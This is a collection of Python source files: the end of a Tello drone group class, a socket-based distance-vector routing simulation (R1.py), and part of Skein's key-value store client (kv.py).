logger.warning("execute command:{}, timeout".format(command))
class TelloGroup(RobotGroupBase):
def __init__(self, client, robot_id_group_list, _robot_id_dict={}, _robot_host_dict={}):
super().__init__(robot_id_group_list, _robot_id_dict)
self._robot_host_dict = _robot_host_dict
self._robot_group_host_list = []
self.init()
self.client = client
def init(self):
for robot_id in self._robots_id_in_group_list:
sn = self._all_robots_dict[robot_id]
host = self._robot_host_dict[sn]
self._robot_group_host_list.append(host)
def get_sn(self):
""" find sn in group"""
return [self._all_robots_dict[robot_id] for robot_id in self._robots_id_in_group_list]
@property
def robot_group_host_list(self):
return self._robot_group_host_list
def get_robot(self, robot_id):
""" get Drone obj """
robot_sn = self._all_robots_dict[robot_id]
robot_host = self._robot_host_dict[robot_sn]
logger.info('get robot:SN:{}, HOST:{}' .format(robot_sn, robot_host))
return SingleDroneInGroup(self.client, robot_id, robot_sn, robot_host)
|
R1.py
|
import socket
import threading
import time
import sys
# Define constant parameters
ALL_CONN = [8080,8181,8282,8383]
SERVER_PORT = 8080
IP_ADDR = "127.0.10.1"
ADDR = (IP_ADDR,SERVER_PORT)
CLIENT_ADDR = list(IP_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
CONFIG_PATH = "config.txt"
NODE_NUM = 1
PING_MSG = "abcdef"
PACKET_SIZE = 1024
FORMAT = "utf-8"
FACTOR = 10e3
UPPER_BOUND = 10e7
# define global variables
server = socket.socket()
client_sockets = []
client = [socket.socket()]*4
client_addrs = []
# Initialize global router table
rt = [['nil',-1,'nil']] * 4
rt[NODE_NUM-1] = [str('R'+str(NODE_NUM)),0,str('R'+str(NODE_NUM))]
latencies = [0.0] * 4
# getTopology() - gets the connection details of the nodes in the network
def getTopology():
# Open file
file = open(CONFIG_PATH,"r")
connections = []
# read the topology details line by line
line = file.readline()
while line:
# Get list of words in the line
words = line.strip().split(" ")
# Get ip and port details
ip_1,port_1 = words[0].split(":")
ip_2,port_2 = words[1].split(":")
# Update connection details
if(ip_1 == IP_ADDR):
connections.append([ip_2,port_2])
elif(ip_2 == IP_ADDR):
connections.append([ip_1,port_1])
line = file.readline()
return connections
# Define function to setup server
def setupServer(connections):
global server
global client_sockets
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
server.listen()
print(f"[LISTENING Server is listening on {IP_ADDR}]")
time.sleep(5)
for i in range(0,len(connections)):
client_conn,cli_addr = server.accept()
client_sockets.append([cli_addr,client_conn])
print(f"[NEW CONNECTION] {cli_addr} connected.")
# Define the function to create client that connects with all nodes specified in the topology
def createClient(connections):
global client
global CLIENT_ADDR
i = 0
for conn in connections:
addr = (conn[0],int(conn[1]))
client[i] = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client[i].bind((CLIENT_ADDR,SERVER_PORT))
client[i].connect(addr)
CLIENT_ADDR = list(CLIENT_ADDR)
CLIENT_ADDR[-1] = str(int(CLIENT_ADDR[-1]) + 1)
CLIENT_ADDR = "".join(CLIENT_ADDR)
i = i + 1
# Let us define th listenToPing() function that responds to incoming pings
def listenToPing(conn):
msg = conn.recv(1024)
conn.send(msg)
# Runner thread to exchange latency contribution of current node to all requesting nodes
def exchangeLatency(conn, lat_str):
msg = conn.recv(1024).decode(FORMAT)
if(msg == "EXCHG"):
conn.send(lat_str.encode(FORMAT))
# function to update the RT based on latency costs from neighbors using Bellman Ford
def updateRT(index,lat_str):
latency = lat_str.strip().split(",")
latency = list(map(float,latency))
cost_x = rt[index][1]
for i in range(0,4):
updated_cost = cost_x + latency[i]
if(rt[i][1] > updated_cost): # update based on min cost
rt[i][1] = updated_cost
rt[i][2] = str("R"+str(index+1))
# Given the current hop and destination find the next hop by calling the appropriate server
def getNextHop(curr_hop,dest,conn):
# First send request to node
request_msg = str(dest)
# time.sleep(2)
conn.send(request_msg.encode(FORMAT))
# Get next hop from node
next_hop = conn.recv(1024).decode(FORMAT)
next_hop = next_hop.strip().split(",")
return next_hop
# runner function to handle next hop requests
def nextHop(conn):
# global client_addrs
# global client_sockets
while(1):
req_msg = conn.recv(1024).decode(FORMAT)
dest = int(req_msg)
# Get next hop
next_hop = rt[dest][2]
# print("sada",next_hop)
if(int(next_hop[1]) != dest+1):
next_conn = client_sockets[client_addrs.index(int(ALL_CONN[int(rt[dest][2][-1]) - 1]))][1]
next_conn.send(str(dest).encode(FORMAT))
next_hop = next_hop + "," + next_conn.recv(1024).decode(FORMAT)
conn.send(next_hop.encode(FORMAT))
def main():
# STEP-1: First let us obtain the topology details from the config.txt file
connections = []
connections = getTopology()
num_connections = len(connections)
print("[NETWORK TOPOLOGY] Number of connections =",len(connections))
for conn in connections:
print("[NETWORK TOPOLOGY] ",IP_ADDR," --> ",conn[0],":",conn[1],sep ="")
# STEP-2: Now that we have the server client details let us create server and client in threads
thread = [0] * 2
thread[0] = threading.Thread(target = setupServer,args = [connections])
thread[0].start()
time.sleep(5)
thread[1] = threading.Thread(target = createClient,args = [connections])
thread[1].start()
# Join both the threads
thread[0].join()
thread[1].join()
# Sleep for 2 seconds to ensure the topology is constructed for all nodes
time.sleep(2)
# Find the latencies of the connections - RTT for a std message
curr_connected = [int(conn[1]) for conn in connections]
# First let us fill in max value for connections not connected to current node
for indx in range(0,len(ALL_CONN)):
if(int(ALL_CONN[indx]) not in curr_connected):
latencies[indx] = UPPER_BOUND
latencies[NODE_NUM - 1] = 0
# STEP-3: Now let us find the RTT of nodes connected to current node
# Setup all the clients in separate threads to respond to any incoming pings
ping_threads = [0] * num_connections
for i in range(0,num_connections):
ping_threads[i] = threading.Thread(target = listenToPing, args = [client[i]])
ping_threads[i].start()
print("[NETWORK TOPOLOGY] Pinging all connected nodes ...")
# Make the server ping all connections
for item in client_sockets:
conn = item[1]
start = time.time()
conn.send(PING_MSG.encode(FORMAT))
ret_msg = conn.recv(1024)
end = time.time()
latencies[ALL_CONN.index(int(item[0][1]))] = (end - start) * FACTOR
# Join all ping threads
for i in range(0,num_connections):
ping_threads[i].join()
print("[NETWORK TOPOLOGY] Latencies:",latencies)
# STEP-4: Init the routing table
print("\n[DVR] Initial Routing Table is:")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
rt[indx] = [str('R'+str(indx+1)),latencies[indx],str('R'+str(indx+1))]
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# STEP-5: Update routing table - For 3 iterations
for loop in range(0,3):
print("\n******************* ITERATION -",loop+1,": ************************")
# First let us setup the string to be passed from R1 (comma separated latencies)
latency_str = ",".join([str(lat[1]) for lat in rt])
# Iterate over all nodes and request if connected
print("\n[DVR] Exchanging Routing Information ...")
for indx in range(0,4):
if indx == NODE_NUM-1:
continue
elif ALL_CONN[indx] not in curr_connected:
print("[DVR]",rt[NODE_NUM-1][0],"is not connected to",rt[indx][0])
# Setup threads to exchange the latency contributions of current code to requesting clients
latency_threads = [0] * num_connections
for i in range(0,num_connections):
latency_threads[i] = threading.Thread(target = exchangeLatency, args = [client[i],latency_str])
latency_threads[i].start()
request_msg = "EXCHG"
received_lat_str = ["0,0,0,0"]*4
i = 0
for item in client_sockets:
conn = item[1]
conn.send(request_msg.encode(FORMAT))
received_lat_str[ALL_CONN.index(int(item[0][1]))] = conn.recv(1024).decode(FORMAT)
for i in range(0,num_connections):
latency_threads[i].join()
print("[DVR] Received routing information is:")
print(received_lat_str)
# Update the router table based on the received latencies - Bellman Ford will used here
for indx in range(0,4):
if(received_lat_str[indx] != "0,0,0,0"):
updateRT(indx,received_lat_str[indx])
print("\n[DVR] Routing Table after iteration -",loop+1,"is: ")
print("%-20s %-25s %-20s" %("Destination","Cost (Latency)","Next Hop"))
for indx in range(0,4):
print("%-20s %-25s %-20s" %(rt[indx][0],rt[indx][1],rt[indx][2]))
# Print the route for each current src - destination pair
global client_addrs
client_addrs = [int(item[0][1]) for item in client_sockets]
# First setup the server thatll respond to requests from from any connection if any (regarding next hops)
hop_threads = [0] * num_connections
for i in range(0,num_connections):
hop_threads[i] = threading.Thread(target = nextHop, args = [client[i]])
hop_threads[i].start()
# Iterate over each destination and find the route by requesting appropriate clients for the next hop
hop_list = [rt[NODE_NUM-1][0]]
print("\n[DVR] Printing routing information")
for i in range(0,4):
if i != NODE_NUM - 1:
dest = rt[i][0]
next_hop = rt[i][2]
hop_list.append(next_hop)
while(dest not in hop_list):
conn = client_sockets[client_addrs.index(ALL_CONN[int(rt[i][2][-1]) - 1])][1]
next_hop = getNextHop(int(next_hop[-1])-1,i,conn)
hop_list.extend(next_hop)
print(*hop_list, sep=' -> ')
hop_list = [rt[NODE_NUM-1][0]]
# Sleep 5 seconds and then close all hop_threads
time.sleep(5)
if __name__ == '__main__':
main()
|
kv.py
|
import textwrap as _textwrap
import threading as _threading
import weakref as _weakref
from collections import (namedtuple as _namedtuple,
deque as _deque,
OrderedDict as _OrderedDict)
from collections.abc import (Mapping as _Mapping,
MutableMapping as _MutableMapping)
from functools import wraps as _wraps
from queue import Queue as _Queue
import grpc as _grpc
from . import proto as _proto
from .exceptions import (ApplicationError as _ApplicationError,
ConnectionError as _ConnectionError)
from .model import (
container_instance_from_string as _container_instance_from_string,
container_instance_to_string as _container_instance_to_string)
from .objects import (Base as _Base,
Enum as _Enum,
no_change as _no_change)
__all__ = ('KeyValueStore',
'ValueOwnerPair',
'TransactionResult',
'Condition', 'is_condition',
'Operation', 'is_operation',
'value', 'owner', 'comparison',
'count', 'list_keys',
'exists', 'missing',
'get', 'get_prefix', 'get_range',
'pop', 'pop_prefix', 'pop_range',
'discard', 'discard_prefix', 'discard_range',
'put', 'swap',
'EventType', 'Event', 'EventFilter', 'EventQueue')
class Operation(_Base):
"""Base class for all key-value store operations"""
__slots__ = ()
def _build_operation(self):
raise NotImplementedError # pragma: no cover
def _build_result(self, result):
raise NotImplementedError # pragma: no cover
class Condition(_Base):
"""Base class for all key-value store conditional expressions"""
__slots__ = ()
def _build_condition(self):
raise NotImplementedError # pragma: no cover
def is_operation(obj):
"""Return if ``obj`` is a valid skein key-value store operation"""
return isinstance(obj, Operation)
def is_condition(obj):
"""Return if ``x`` is a valid skein key-value store condition"""
return isinstance(obj, Condition)
class EventType(_Enum):
"""Event types to listen on.
Attributes
----------
ALL : EventType
All events.
PUT : EventType
Only ``PUT`` events.
DELETE : EventType
Only ``DELETE`` events.
"""
_values = ('ALL', 'PUT', 'DELETE')
class EventFilter(object):
"""An event filter.
Specifies a subset of events to watch for. May specify one of ``key``,
``prefix``, or ``start``/``end``. If no parameters are
provided, selects all events.
Parameters
----------
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``
"""
__slots__ = ('_start', '_end', '_event_type')
def __init__(self, key=None, prefix=None, start=None,
end=None, event_type=None):
has_key = key is not None
has_prefix = prefix is not None
has_range = start is not None or end is not None
if (has_key + has_prefix + has_range) > 1:
raise ValueError("Must specify at most one of `key`, `prefix`, or "
"`start`/`end`")
if has_key:
if not isinstance(key, str):
raise TypeError("key must be a string")
start = key
end = key + '\x00'
elif has_prefix:
if not isinstance(prefix, str):
raise TypeError("prefix must be a string")
start = prefix
end = _next_key(prefix)
else:
if not (start is None or isinstance(start, str)):
raise TypeError("start must be a string or None")
if not (end is None or isinstance(end, str)):
raise TypeError("end must be a string or None")
event_type = (EventType.ALL if event_type is None
else EventType(event_type))
self._start = start
self._end = end
self._event_type = event_type
start = property(lambda s: s._start)
end = property(lambda s: s._end)
event_type = property(lambda s: s._event_type)
def __repr__(self):
return ('EventFilter(start=%r, end=%r, event_type=%r)'
% (self._start, self._end, self._event_type))
def __reduce__(self):
return (EventFilter, (None, None, self.start,
self.end, self.event_type))
def __eq__(self, other):
return (type(self) is type(other) and
self.start == other.start and
self.end == other.end and
self.event_type == other.event_type)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash((self.start, self._end, self.event_type))
class Event(_namedtuple('Event',
['key', 'result', 'event_type', 'event_filter'])):
"""An event in the key-value store.
Parameters
----------
key : str
The key affected.
result : ValueOwnerPair or None
The value and owner for the key. None if a ``'DELETE'`` event.
event_type : EventType
The type of event.
event_filter : EventFilter
The event filter that generated the event.
"""
pass
class TransactionResult(_namedtuple('TransactionResult',
['succeeded', 'results'])):
"""A result from a key-value store transaction.
Parameters
----------
succeeded : bool
Whether the transaction conditions evaluated to True.
results : sequence
A sequence of results from applying all operations in the transaction
``on_success`` or ``on_failure`` parameters, depending on whether the
conditions evaluated to True or False.
"""
pass
class ValueOwnerPair(_namedtuple('ValueOwnerPair', ['value', 'owner'])):
"""A (value, owner) pair in the key-value store.
Parameters
----------
value : bytes
The value.
owner : str or None
The owner container_id, or None for no owner.
"""
pass
def _value_owner_pair(kv):
"""Build a ValueOwnerPair from a KeyValue object"""
return ValueOwnerPair(kv.value, (_container_instance_to_string(kv.owner)
if kv.HasField("owner") else None))
class EventQueue(object):
"""A queue of events on the key-value store.
Besides the normal ``Queue`` interface, also supports iteration.
>>> for event in app.kv.events(prefix='bar'):
... print(event)
If an event falls into multiple selected filters, it will be placed in the
event queue once for each filter. For example, ``prefix='bar'`` and
``key='bart'`` would both recieve events on ``key='bart'``. If a queue was
subscribed to both events, changes to this key would be placed in the queue
twice, once for each filter.
All events are unsubscribed when this object is collected. Can also be used
as a contextmanager to unsubscribe-all on ``__exit__``, or explicitly call
``unsubscribe_all``.
"""
def __init__(self, kv):
self._kv = kv
self.filters = set()
self._queue = _Queue()
self._exception = None
self._ref = _weakref.ref(self)
def __repr__(self):
return 'EventQueue<%d filters>' % len(self.filters)
def __iter__(self):
while True:
yield self.get()
def __enter__(self):
return self
def __exit__(self, *args):
self.unsubscribe_all()
def __del__(self):
self.unsubscribe_all()
def _build_event_filter(self, event_filter=None, **kwargs):
if event_filter is not None:
if any(v is not None for v in kwargs.values()):
raise ValueError("Cannot provide ``event_filter`` and "
"other arguments")
if not isinstance(event_filter, EventFilter):
raise TypeError("event_filter must be an EventFilter")
else:
event_filter = EventFilter(**kwargs)
return event_filter
@_wraps(_Queue.get)
def get(self, block=True, timeout=None):
if self._exception is not None:
raise self._exception
out = self._queue.get(block=block, timeout=timeout)
if isinstance(out, Exception):
self._exception = out
raise out
return out
@_wraps(_Queue.put)
def put(self, item, block=True, timeout=None):
self._queue.put(item, block=block, timeout=timeout)
def subscribe(self, event_filter=None, key=None, prefix=None,
start=None, end=None, event_type=None):
"""Subscribe to an event filter.
May provide either an explicit event filter, or provide arguments to
create a new one and add it to the queue. In either case, the event
filter is returned.
If no arguments are provided, subscribes to all events.
Parameters
----------
event_filter : EventFilter
An explicit EventFilter. If provided, no other keyword arguments
may be provided.
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``.
Returns
-------
EventFilter
"""
event_filter = self._build_event_filter(event_filter=event_filter,
key=key,
prefix=prefix,
start=start,
end=end,
event_type=event_type)
if event_filter in self.filters:
return event_filter
self._kv._add_subscription(self, event_filter)
self.filters.add(event_filter)
return event_filter
def unsubscribe(self, event_filter=None, key=None, prefix=None,
start=None, end=None, event_type=None):
"""Unsubscribe from an event filter.
May provide either an explicit event filter, or provide arguments to
create a new one and add it to the queue.
If no arguments are provided, unsubscribes from a filter of all events.
A ``ValueError`` is raised if the specified filter isn't currently
subscribed to.
Parameters
----------
event_filter : EventFilter
An explicit EventFilter. If provided, no other keyword arguments
may be provided.
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``.
Returns
-------
EventFilter
"""
event_filter = self._build_event_filter(event_filter=event_filter,
key=key,
prefix=prefix,
start=start,
end=end,
event_type=event_type)
if event_filter not in self.filters:
raise ValueError("not currently subscribed to %r" % (event_filter,))
self._kv._remove_subscription(self, event_filter)
self.filters.discard(event_filter)
return event_filter
def unsubscribe_all(self):
"""Unsubscribe from all event filters"""
# make a copy while iterating
for filter in list(self.filters):
self.unsubscribe(filter)
class KeyValueStore(_MutableMapping):
"""The Skein Key-Value store.
Used by applications to coordinate configuration and global state.
"""
def __init__(self, client):
# The application client
self._client = client
# A lock to secure internal state
self._lock = _threading.Lock()
# Event listener thread is None initially
self._event_listener_started = False
def _ensure_event_listener(self):
with self._lock:
if not self._event_listener_started:
# A queue of input requests, used by the input iterator
self._input_queue = _Queue()
# A deque of event filters waiting to be paired with a watch_id
self._create_deque = _deque()
# Mapping of watch_id to EventFilter
self._id_to_filter = {}
# Mapping of EventFilter to watch_id
self._filter_to_id = {}
# Mapping of EventFilter to a set of EventQueue weakrefs
self._filter_to_queues = {}
# Mapping of EventFilter to threading.Event/True
self._filter_subscribed = {}
# The output from the watch stream, processed by the handler loop
self._output_iter = self._client._call('Watch', self._input_iter())
# A thread for managing outputs from the watch stream
self._event_listener = _threading.Thread(target=self._handler_loop)
self._event_listener.daemon = True
self._event_listener.start()
self._event_listener_started = True
def _handler_loop(self):
while True:
try:
resp = next(self._output_iter)
except _grpc.RpcError as _exc:
exc = _exc
else:
exc = None
if exc is not None:
# Stream errored (all exceptions are unexpected)
# Shutdown stream state and notify all event queues
exc = (_ConnectionError("Unable to connect to application")
if exc.code() == _grpc.StatusCode.UNAVAILABLE
else _ApplicationError(exc.details()))
self._input_queue.put((None, None))
with self._lock:
all_qs = set(q for qs in self._filter_to_queues.values()
for q in qs)
for eq_ref in all_qs:
try:
eq_ref().put(exc)
except AttributeError: # pragma: nocover
# reference dropped, but __del__ not yet run
# this is hard to test, so no covererage
pass
break
watch_id = resp.watch_id
if resp.type == _proto.WatchResponse.CREATE:
event_filter = self._create_deque.popleft()
with self._lock:
self._id_to_filter[watch_id] = event_filter
self._filter_to_id[event_filter] = watch_id
self._filter_subscribed[event_filter].set()
self._filter_subscribed[event_filter] = True
elif resp.type != _proto.WatchResponse.CANCEL:
event_type = EventType(_proto.WatchResponse.Type.Name(resp.type))
with self._lock:
event_filter = self._id_to_filter.get(watch_id)
if event_filter is not None:
for kv in resp.event:
event = Event(key=kv.key,
result=(_value_owner_pair(kv)
if event_type == EventType.PUT
else None),
event_filter=event_filter,
event_type=event_type)
for eq_ref in self._filter_to_queues[event_filter]:
try:
eq_ref().put(event)
except AttributeError: # pragma: nocover
# reference dropped, but __del__ not yet run
# this is hard to test, so no covererage
pass
def _input_iter(self):
while True:
req, event_filter = self._input_queue.get()
if req is None:
break # shutdown flag
elif event_filter is not None:
# Create request, enque the event filter for later
self._create_deque.append(event_filter)
yield req
def _add_subscription(self, event_queue, event_filter):
with self._lock:
eq_ref = event_queue._ref
if event_filter in self._filter_to_queues:
self._filter_to_queues[event_filter].add(eq_ref)
subscribed = self._filter_subscribed[event_filter]
if subscribed is True:
return
else:
self._filter_to_queues[event_filter] = {eq_ref}
subscribed = self._filter_subscribed[event_filter] = _threading.Event()
req = _proto.WatchCreateRequest(start=event_filter.start,
end=event_filter.end,
event_type=str(event_filter.event_type))
self._input_queue.put((_proto.WatchRequest(create=req), event_filter))
# Wait for subscription to occur
subscribed.wait()
def _remove_subscription(self, event_queue, event_filter):
with self._lock:
eq_ref = event_queue._ref
if event_filter in self._filter_to_queues:
self._filter_to_queues[event_filter].discard(eq_ref)
if not self._filter_to_queues[event_filter]:
# Last queue registered for this filter - issue cancel
watch_id = self._filter_to_id[event_filter]
req = _proto.WatchCancelRequest(watch_id=watch_id)
self._input_queue.put((_proto.WatchRequest(cancel=req), None))
# Cleanup state
del self._id_to_filter[watch_id]
del self._filter_to_id[event_filter]
del self._filter_to_queues[event_filter]
del self._filter_subscribed[event_filter]
def event_queue(self):
"""Create a new EventQueue subscribed to no events.
Examples
--------
Subscribe to events starting with ``'foo'`` or ``'bar'``.
>>> foo = skein.kv.EventFilter(prefix='foo')
>>> bar = skein.kv.EventFilter(prefix='bar')
>>> queue = app.kv.event_queue() # doctest: skip
>>> queue.subscribe(foo) # doctest: skip
>>> queue.subscribe(bar) # doctest: skip
>>> for event in queue: # doctest: skip
... if event.filter == foo:
... print("foo event")
... else:
... print("bar event")
"""
self._ensure_event_listener()
return EventQueue(self)
def events(self, event_filter=None, key=None, prefix=None,
start=None, end=None, event_type=None):
"""Shorthand for creating an EventQueue and adding a single filter.
May provide either an explicit event filter, or provide arguments to
create a new one and add it to the queue.
If no arguments are provided, creates a queue subscribed to all events.
Parameters
----------
event_filter : EventFilter
An explicit EventFilter. If provided, no other keyword arguments
may be provided.
key : str, optional
If present, only events from this key will be selected.
prefix : str, optional
If present, only events with this key prefix will be selected.
start : str, optional
If present, specifies the lower bound of the key range, inclusive.
end : str, optional
If present, specifies the upper bound of the key range, exclusive.
event_type : EventType, optional.
The type of event. Default is ``'ALL'``.
Returns
-------
EventQueue
Examples
--------
Subscribe to all events with prefix ``'foo'``:
>>> for event in app.kv.events(prefix='foo'): # doctest: skip
... if event.type == 'PUT':
... print("PUT<key=%r, value=%r>" % (event.key, event.value))
... else: # DELETE
... print("DELETE<key=%r>" % event.key)
PUT<key='foo', value=b'bar'>
PUT<key='food', value=b'biz'>
DELETE<key='food'>
PUT<key='foo', value=b'changed'>
"""
queue = self.event_queue()
queue.subscribe(event_filter=event_filter,
key=key,
prefix=prefix,
start=start,
end=end,
event_type=event_type)
return queue
def _apply_op(self, op, timeout=None):
req = op._build_operation()
resp = self._client._call(op._rpc, req, timeout=timeout)
return op._build_result(resp)
def __iter__(self):
return iter(self.list_keys())
def __len__(self):
return self.count()
def __setitem__(self, key, value):
self.put(key, value=value)
def __getitem__(self, key):
result = self.get(key)
if result is None:
raise KeyError(key)
return result
def __delitem__(self, key):
if not self.discard(key):
raise KeyError(key)
def __contains__(self, key):
return self.exists(key)
def wait(self, key, return_owner=False):
"""Get the value associated with a single key, blocking until the key
exists if not present.
Parameters
----------
key : str
The key to get.
return_owner : bool, optional
If True, the owner will also be returned along with the value. Default
is False.
Returns
-------
bytes or ValueOwnerPair
"""
with self.events(key=key, event_type='put') as event_queue:
# We `get` after creating an event queue to avoid the following
# race condition:
# - get fails to find key
# - key is created by different client
# - event queue is created, waiting for PUT events
res = self.get(key=key, return_owner=return_owner)
if ((return_owner and res.value is not None) or
(not return_owner and res is not None)):
return res
event = event_queue.get()
return event.result if return_owner else event.result.value
def clear(self):
self.discard_range()
def setdefault(self, key, default):
"""Get the value associated with key, setting it to default if
not present.
This transaction happens atomically on the key-value store.
Parameters
----------
key : str
The key
default : bytes
The default value to set if the key isn't present.
Returns
-------
value : bytes
"""
res = self.transaction(conditions=[exists(key)],
on_success=[get(key)],
on_failure=[put(key, default)])
return res.results[0] if res.succeeded else default
def update(self, *args, **kwargs):
"""Update the key-value store with multiple key-value pairs atomically.
Parameters
----------
arg : mapping or iterable, optional
Either a mapping or an iterable of ``(key, value)``.
**kwargs
Extra key-value pairs to set. Semantically these are applied after
any present in ``arg``, and will thus override any intersecting
keys between the two.
"""
if len(args) > 1:
raise TypeError('update expected at most 1 arguments, got %d' %
len(args))
if args:
other = args[0]
if isinstance(other, _Mapping):
ops = [put(k, v) for k, v in other.items()]
elif hasattr(other, "keys"):
ops = [put(k, other[k]) for k in other.keys()]
else:
ops = [put(k, v) for k, v in other]
else:
ops = []
ops.extend(put(k, v) for k, v in kwargs.items())
self.transaction(on_success=ops)
def transaction(self, conditions=None, on_success=None, on_failure=None):
"""An atomic transaction on the key-value store.
Parameters
----------
conditions : Condition or sequence of Conditions, optional
A sequence of conditions to evaluate together. The conditional
expression succeeds if all conditions evaluate to True, and fails
otherwise. If no conditions are provided the conditional expression
also succeeds.
on_success : Operation or sequence of Operation, optional
A sequence of operations to apply if all conditions evaluate to
True.
on_failure : Operation or sequence of Operation, optional
A sequence of operations to apply if any condition evaluates to
False.
Returns
-------
result : TransactionResult
A namedtuple of (succeeded, results), where results is a list of
results from either the ``on_success`` or ``on_failure``
operations, depending on which branch was evaluated.
Examples
--------
This implements an atomic `compare-and-swap
<https://en.wikipedia.org/wiki/Compare-and-swap>`_ operation, a useful
concurrency primitive. It sets ``key`` to ``new`` only if it currently
is ``prev``:
>>> from skein import kv
>>> def compare_and_swap(app, key, new, prev):
... result = app.kv.transaction(
... conditions=[kv.value(key) == prev], # if key == prev
... on_success=[kv.put(key, new)]) # then set key = new
... return result.succeeded
>>> app.kv['key'] = b'value' # doctest: skip
Since ``'key'`` currently is ``b'value'``, the conditional expression
succeeds and ``'key'`` is set to ``b'new_value'``
>>> compare_and_swap(app, 'key', b'new_value', b'value') # doctest: skip
True
Since ``'key'`` currently is ``b'value'`` and not ``b'wrong'``, the
conditional expression fails and ``'key'`` remains unchanged.
>>> compare_and_swap(app, 'key', b'another_value', b'wrong') # doctest: skip
False
"""
conditions = conditions or []
on_success = on_success or []
on_failure = on_failure or []
if not all(is_condition(c) for c in conditions):
raise TypeError("conditions must be a sequence of Condition")
if not all(is_operation(o) for o in on_success):
raise TypeError("on_success must be a sequence of Operation")
if not all(is_operation(o) for o in on_failure):
raise TypeError("on_failure must be a sequence of Operation")
lk = {'GetRange': 'get_range',
'DeleteRange': 'delete_range',
'PutKey': 'put_key'}
def _build_req(op):
return _proto.OpRequest(**{lk[op._rpc]: op._build_operation()})
def _build_result(op, resp):
return op._build_result(getattr(resp, lk[op._rpc]))
req = _proto.TransactionRequest(
condition=[c._build_condition() for c in conditions],
on_success=[_build_req(o) for o in on_success],
on_failure=[_build_req(o) for o in on_failure])
resp = self._client._call('Transaction', req)
ops = on_success if resp.succeeded else on_failure
results = [_build_result(o, r) for (o, r) in zip(ops, resp.result)]
return TransactionResult(resp.succeeded, results)
def _next_key(prefix):
b = bytearray(prefix.encode('utf-8'))
b[-1] += 1
return bytes(b).decode('utf-8')
def _register_op(return_type=None):
"""Register a key-value store operator"""
def inner(cls):
@_wraps(cls.__init__)
def method(self, *args, **kwargs):
return self._apply_op(cls(*args, **kwargs))
if cls.__doc__ is not None:
prefix = 'A request to '
assert cls.__doc__.startswith(prefix)
doc = cls.__doc__[len(prefix):].strip()
header, _, footer = doc.partition('\n\n')
header_words = header.split()
header_words[0] = header_words[0].capitalize()
header = '\n'.join(_textwrap.wrap(' '.join(header_words),
width=76,
initial_indent=" ",
subsequent_indent=" "))
if return_type:
returns = ("\n"
"\n"
" Returns\n"
" -------\n"
" %s" % return_type)
else:
returns = ""
method.__doc__ = "%s\n\n%s%s" % (header, footer, returns)
setattr(KeyValueStore, cls.__name__, method)
return cls
return inner
class comparison(Condition):
"""A comparison of the value or owner for a specified key.
Parameters
----------
key : str
The corresponding key.
field : {'value', 'owner'}
The field to compare on.
operator : {'==', '!=', '>', '>=', '<', '<='}
The comparison operator to use.
rhs : bytes, str or None
The right-hand-side of the condition expression.
Must be a ``bytes`` if ``field='value'``, or ``str`` or ``None`` if
``field='owner'``.
"""
__slots__ = ('_key', '_field', '_operator', '_rhs', '_rhs_proto')
_params = ('key', 'field', 'operator', 'rhs')
_operator_lk = {'==': 'EQUAL', '!=': 'NOT_EQUAL',
'<': 'LESS', '<=': 'LESS_EQUAL',
'>': 'GREATER', '>=': 'GREATER_EQUAL'}
def __init__(self, key, field, operator, rhs):
if not isinstance(key, str):
raise TypeError("key must be a string")
self._key = key
if field not in {'value', 'owner'}:
raise ValueError("field must be either 'value' or 'owner'")
self._field = field
if operator not in self._operator_lk:
raise ValueError("operator must be in {'==', '!=', '<', '>', "
"'<=', '>='}")
self._operator = operator
if field == 'owner':
if rhs is None:
if operator not in ('==', '!='):
raise TypeError("Comparison (owner(%r) %s None) is "
"unsupported" % (key, operator))
self._rhs_proto = self._rhs = None
elif isinstance(rhs, str):
self._rhs_proto = _container_instance_from_string(rhs)
self._rhs = rhs
else:
raise TypeError("rhs must be a string or None")
else:
if not isinstance(rhs, bytes):
raise TypeError("rhs must be bytes")
self._rhs_proto = self._rhs = rhs
key = property(lambda self: self._key)
field = property(lambda self: self._field)
operator = property(lambda self: self._operator)
rhs = property(lambda self: self._rhs)
def __repr__(self):
return '%s(%r) %s %r' % (self._field, self.key, self.operator, self.rhs)
def _build_condition(self):
kwargs = {'key': self.key,
'operator': self._operator_lk[self.operator],
'field': self.field.upper(),
self.field: self._rhs_proto}
return _proto.Condition(**kwargs)
class _ComparisonBuilder(_Base):
"""Base class for `value` and `owner`"""
__slots__ = ('_key',)
_params = ('key',)
def __init__(self, key):
if not isinstance(key, str):
raise TypeError("key must be a string")
self._key = key
key = property(lambda self: self._key)
_field = property(lambda self: type(self).__name__)
def __repr__(self):
return '%s(%r)' % (type(self).__name__, self.key)
def __eq__(self, other):
return comparison(self.key, self._field, '==', other)
def __ne__(self, other):
return comparison(self.key, self._field, '!=', other)
def __lt__(self, other):
return comparison(self.key, self._field, '<', other)
def __le__(self, other):
return comparison(self.key, self._field, '<=', other)
def __gt__(self, other):
return comparison(self.key, self._field, '>', other)
def __ge__(self, other):
return comparison(self.key, self._field, '>=', other)
class value(_ComparisonBuilder):
"""Represents the value for a key, for use in transaction conditions.
Parameters
----------
key : str
The key to lookup
"""
pass
class owner(_ComparisonBuilder):
"""Represents the owner for a key, for use in transaction conditions.
Parameters
----------
key : str
The key to lookup
"""
pass
class _CountOrKeys(Operation):
"""Base class for count & keys"""
__slots__ = ()
_rpc = 'GetRange'
def __init__(self, start=None, end=None, prefix=None):
self.start = start
self.end = end
